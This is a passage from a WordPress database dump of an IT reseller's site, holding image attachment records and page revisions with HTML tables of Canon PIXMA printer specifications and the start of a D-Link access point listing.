03:18:13','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png',0,'attachment','image/png',0),(2349,1,'2018-12-18 11:34:44','2018-12-18 03:34:44','','1ae3c86cb64b465c9683e7c860d92b25_PIXMA+G2010_1','','inherit','closed','closed','','1ae3c86cb64b465c9683e7c860d92b25_pixmag2010_1','','','2018-12-18 11:34:44','2018-12-18 03:34:44','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png',0,'attachment','image/png',0),(2351,1,'2018-12-18 11:38:57','2018-12-18 03:38:57','','095399e7118a4e898b6df8c1808358de_g4010_03','','inherit','closed','closed','','095399e7118a4e898b6df8c1808358de_g4010_03','','','2018-12-18 11:38:57','2018-12-18 03:38:57','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png',0,'attachment','image/png',0),(2352,1,'2018-12-18 11:39:48','2018-12-18 03:39:48','','7e8a12fd533e44278de28d2734874949_PIXMA+G1010_4','','inherit','closed','closed','','7e8a12fd533e44278de28d2734874949_pixmag1010_4','','','2018-12-18 11:39:48','2018-12-18 03:39:48','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png',0,'attachment','image/png',0),(2353,1,'2018-12-18 11:53:53','2018-12-18 03:53:53','','e2f221acba7b4ca795be93654fafca7b_PIXMA+E560_2','','inherit','closed','closed','','e2f221acba7b4ca795be93654fafca7b_pixmae560_2-2','','','2018-12-18 11:53:53','2018-12-18 03:53:53','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-1.png',0,'attachment','image/png',0),(2355,1,'2018-12-18 12:06:30','2018-12-18 04:06:30','&lt;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2345\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA E560 / E560R\r\n\r\nAdvanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing\r\n\r\nThe Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.\r\n\r\nAvailable in Black and Red.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour\r\n\r\nHi-speed USB 2.0, WiFi\r\n\r\nRecommended print volume: 80 - 400 pages</td>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2346\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA E4270\r\n\r\nCompact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\r\n\r\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\r\n\r\nPrint, Scan, Copy, Fax\r\n\r\nISO standard print speed (A4): 8.8ipm black / 4.4ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\r\n\r\nRecommended print volume: 50 - 200 pages</td>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2347\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA TS9570\r\n\r\nA3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder\r\n\r\nThis A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct\r\n\r\nRecommended print volume: 80 - 300 pages</td>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2348\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA TS8270\r\n\r\nWireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing\r\n\r\nThis advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.\r\n\r\nAvailable in Black, Red and White.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct\r\n\r\nRecommended print volume: 30 - 100 pages</td>\r\n</tr>\r\n<tr>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2349\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXM<span style=\"font-family: inherit; font-size: inherit;\">A</span><span style=\"font-family: inherit; font-size: inherit;\">Â G2010</span>\r\n\r\nRefillable Ink Tank All-In-One for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint, Scan &amp; Copy\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0\r\n\r\nRecommended print volume: 150 - 1500 pages</td>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2351\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA G4010\r\n\r\nRefillable Ink Tank Wireless All-In-One with Fax for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost.\r\n\r\nPrint, Scan, Copy and Fax\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode\r\n\r\nRecommended print volume: 150 - 1500 pages</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2352\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA G1010\r\n\r\nRefillable Ink Tank Printer for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint\r\n\r\nISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)\r\n\r\nPhoto Speed (4 x 6\"): 60sec. (borderless)</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2353\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA G3010\r\n\r\nRefillable Ink Tank Wireless All-In-One for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint, ScanÂ  Copy\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, Access Point Mode\r\n\r\nRecommended print volume: 150 - 1500 pages</td>\r\n</tr>\r\n</tbody>\r\n</table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-18 12:06:30','2018-12-18 04:06:30','',1449,'https://bintara.com.my/blog/2018/12/18/1449-revision-v1/',0,'revision','',0),(2354,1,'2018-12-18 11:54:11','2018-12-18 03:54:11','<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2345\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA E560 / E560R\r\n\r\nAdvanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing\r\n\r\nThe Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.\r\n\r\nAvailable in Black and Red.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour\r\n\r\nHi-speed USB 2.0, WiFi\r\n\r\nRecommended print volume: 80 - 400 pages</td>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2346\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA E4270\r\n\r\nCompact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\r\n\r\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\r\n\r\nPrint, Scan, Copy, Fax\r\n\r\nISO standard print speed (A4): 8.8ipm black / 4.4ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\r\n\r\nRecommended print volume: 50 - 200 pages</td>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2347\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA TS9570\r\n\r\nA3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder\r\n\r\nThis A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct\r\n\r\nRecommended print volume: 80 - 300 pages</td>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2348\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA TS8270\r\n\r\nWireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing\r\n\r\nThis advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.\r\n\r\nAvailable in Black, Red and White.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct\r\n\r\nRecommended print volume: 30 - 100 pages</td>\r\n</tr>\r\n<tr>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2349\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXM<span style=\"font-family: inherit; font-size: inherit;\">A</span><span style=\"font-family: inherit; font-size: inherit;\">Â G2010</span>\r\n\r\nRefillable Ink Tank All-In-One for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint, Scan &amp; Copy\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0\r\n\r\nRecommended print volume: 150 - 1500 pages</td>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2351\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA G4010\r\n\r\nRefillable Ink Tank Wireless All-In-One with Fax for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost.\r\n\r\nPrint, Scan, Copy and Fax\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode\r\n\r\nRecommended print volume: 150 - 1500 pages</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2352\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA G1010\r\n\r\nRefillable Ink Tank Printer for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint\r\n\r\nISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)\r\n\r\nPhoto Speed (4 x 6\"): 60sec. (borderless)</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2353\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA G3010\r\n\r\nRefillable Ink Tank Wireless All-In-One for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint, ScanÂ  Copy\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, Access Point Mode\r\n\r\nRecommended print volume: 150 - 1500 pages</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n</tr>\r\n</tbody>\r\n</table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-18 11:54:11','2018-12-18 03:54:11','',1449,'https://bintara.com.my/blog/2018/12/18/1449-revision-v1/',0,'revision','',0),(2356,1,'2018-12-18 12:07:41','2018-12-18 04:07:41','&lt;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2345\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA E560 / E560R\r\n\r\nAdvanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing\r\n\r\nThe Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.\r\n\r\nAvailable in Black and Red.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour\r\n\r\nHi-speed USB 2.0, WiFi\r\n\r\nRecommended print volume: 80 - 400 pages</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2346\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA E4270\r\n\r\nCompact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\r\n\r\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\r\n\r\nPrint, Scan, Copy, Fax\r\n\r\nISO standard print speed (A4): 8.8ipm black / 4.4ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\r\n\r\nRecommended print volume: 50 - 200 pages</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2347\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA TS9570\r\n\r\nA3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder\r\n\r\nThis A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct\r\n\r\nRecommended print volume: 80 - 300 pages</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2348\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA TS8270\r\n\r\nWireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing\r\n\r\nThis advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.\r\n\r\nAvailable in Black, Red and White.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct\r\n\r\nRecommended print volume: 30 - 100 pages</td>\r\n</tr>\r\n<tr>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2349\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXM<span style=\"font-family: inherit; font-size: inherit;\">A</span><span style=\"font-family: inherit; font-size: inherit;\">Â G2010</span>\r\n\r\nRefillable Ink Tank All-In-One for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint, Scan &amp; Copy\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0\r\n\r\nRecommended print volume: 150 - 1500 pages</td>\r\n<td width=\"\"><img class=\"alignnone size-full wp-image-2351\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA G4010\r\n\r\nRefillable Ink Tank Wireless All-In-One with Fax for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost.\r\n\r\nPrint, Scan, Copy and Fax\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode\r\n\r\nRecommended print volume: 150 - 1500 pages</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2352\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA G1010\r\n\r\nRefillable Ink Tank Printer for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint\r\n\r\nISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)\r\n\r\nPhoto Speed (4 x 6\"): 60sec. (borderless)</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2353\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nPIXMA G3010\r\n\r\nRefillable Ink Tank Wireless All-In-One for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint, ScanÂ  Copy\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, Access Point Mode\r\n\r\nRecommended print volume: 150 - 1500 pages</td>\r\n</tr>\r\n</tbody>\r\n</table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-18 12:07:41','2018-12-18 04:07:41','',1449,'https://bintara.com.my/blog/2018/12/18/1449-revision-v1/',0,'revision','',0),(2357,1,'2018-12-18 12:16:03','2018-12-18 04:16:03','<h3>Printer :-</h3>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2345\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>PIXMA E560 / E560R</strong>\r\n\r\nAdvanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing\r\n\r\nThe Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.\r\n\r\nAvailable in Black and Red.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour\r\n\r\nHi-speed USB 2.0, WiFi\r\n\r\nRecommended print volume: 80 - 400 pages\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2346\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>PIXMA E4270</strong>\r\n\r\n<span style=\"font-family: inherit; font-size: inherit;\">Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</span>\r\n\r\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\r\n\r\nPrint, Scan, Copy, Fax\r\n\r\nISO standard print speed (A4): 8.8ipm black / 4.4ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\r\n\r\nRecommended print volume: 50 - 200 pages\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2347\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>PIXMA TS9570</strong>\r\n\r\nA3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder\r\n\r\nThis A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct\r\n\r\nRecommended print volume: 80 - 300 pages\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2348\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>PIXMA TS8270</strong>\r\n\r\nWireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing\r\n\r\nThis advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.\r\n\r\nAvailable in Black, Red and White.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct\r\n\r\nRecommended print volume: 30 - 100 pages\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2349\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>PIXM<span style=\"font-family: inherit; font-size: inherit;\">A</span><span style=\"font-family: inherit; font-size: inherit;\">Â G2010</span></strong>\r\n\r\nRefillable Ink Tank All-In-One for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint, Scan &amp; Copy\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0\r\n\r\nRecommended print volume: 150 - 1500 pages\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2351\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>PIXMA G4010</strong>\r\n\r\nRefillable Ink Tank Wireless All-In-One with Fax for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost.\r\n\r\nPrint, Scan, Copy and Fax\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode\r\n\r\nRecommended print volume: 150 - 1500 pages\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2352\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>PIXMA G1010</strong>\r\n\r\nRefillable Ink Tank Printer for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint\r\n\r\nISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)\r\n\r\nPhoto Speed (4 x 6\"): 60sec. (borderless)\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2353\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-1.png\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>PIXMA G3010</strong>\r\n\r\nRefillable Ink Tank Wireless All-In-One for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint, ScanÂ  Copy\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, Access Point Mode\r\n\r\nRecommended print volume: 150 - 1500 pages\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n</tr>\r\n</tbody>\r\n</table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-18 12:16:03','2018-12-18 04:16:03','',1449,'https://bintara.com.my/blog/2018/12/18/1449-revision-v1/',0,'revision','',0),(2359,1,'2018-12-18 12:40:52','2018-12-18 04:40:52','','dap-2680-features3','','inherit','closed','closed','','dap-2680-features3','','','2018-12-18 12:40:52','2018-12-18 04:40:52','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png',0,'attachment','image/png',0),(2360,1,'2018-12-18 12:42:06','2018-12-18 04:42:06','','dap-3310-front-510x600','','inherit','closed','closed','','dap-3310-front-510x600','','','2018-12-18 12:42:06','2018-12-18 04:42:06','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg',0,'attachment','image/jpeg',0),(2361,1,'2018-12-18 12:42:55','2018-12-18 04:42:55','','ProductMainImage1-510x600','','inherit','closed','closed','','productmainimage1-510x600','','','2018-12-18 12:42:55','2018-12-18 04:42:55','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png',0,'attachment','image/png',0),(2362,1,'2018-12-18 12:44:06','2018-12-18 04:44:06','','ProductMainImage-510x600','','inherit','closed','closed','','productmainimage-510x600','','','2018-12-18 12:44:06','2018-12-18 04:44:06','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png',0,'attachment','image/png',0),(2363,1,'2018-12-18 12:44:41','2018-12-18 04:44:41','','DAP-2610-featured-510x600','','inherit','closed','closed','','dap-2610-featured-510x600','','','2018-12-18 12:44:41','2018-12-18 04:44:41','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg',0,'attachment','image/jpeg',0),(2364,1,'2018-12-18 12:45:11','2018-12-18 04:45:11','','dap-2330-front-510x600','','inherit','closed','closed','','dap-2330-front-510x600','','','2018-12-18 12:45:11','2018-12-18 04:45:11','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg',0,'attachment','image/jpeg',0),(2365,1,'2018-12-18 13:01:26','2018-12-18 05:01:26','D - Link Product Business Solution : -\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2359\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" width=\"500\" height=\"500\" />\r\n\r\nAC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Point\r\n\r\n&nbsp;\r\n\r\nâ€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps\r\n\r\nâ€¢ MU-MIMO with beamforming\r\n\r\nâ€¢ Band steering\r\n\r\nâ€¢ 